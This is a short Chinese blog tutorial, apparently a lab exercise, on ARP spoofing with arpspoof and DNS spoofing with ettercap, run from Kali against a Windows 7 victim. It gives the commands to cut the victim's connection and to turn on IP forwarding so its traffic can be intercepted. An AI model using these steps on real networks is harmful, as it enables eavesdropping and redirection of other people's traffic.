arp欺骗和dns欺骗

kali换更新源

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

vim  /etc/apt/sources.list

从上方随便找一个源添加进去

apt-get update

安装arpspoof

apt install dsniff

1.使用arpspoof实现断网攻击(kali 攻击机,win7受害主机)

arp欺骗成功后浏览器不能浏览网页

永久开启路由转发功能,就可以上网,但数据都经过kali,可以进行窃听

修改/etc/sysctl.conf,将net.ipv4.ip_forward=1的#去掉

sysctl -p生效

路由转发功能开启后可以上网   

arpspoof -I eth0 -t 192.168.52.143 192.168.52.2

-l   表示是哪一个网卡  第一个ip表示攻击的目标   第二个ip表示伪造的网关

下面是攻击成功后的截图

2.dns欺骗  (kali 攻击机,win7受害主机)

ettercap -G

添加目标主机IP(targert)

找到对应扩展(plugin),manage plugins,并激活(activate)

修改/etc/ettercap/etter.dns   添加记录

目标主机要关闭防火墙,刷新dns缓存,欺骗成功

ipconfig /flushdns

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值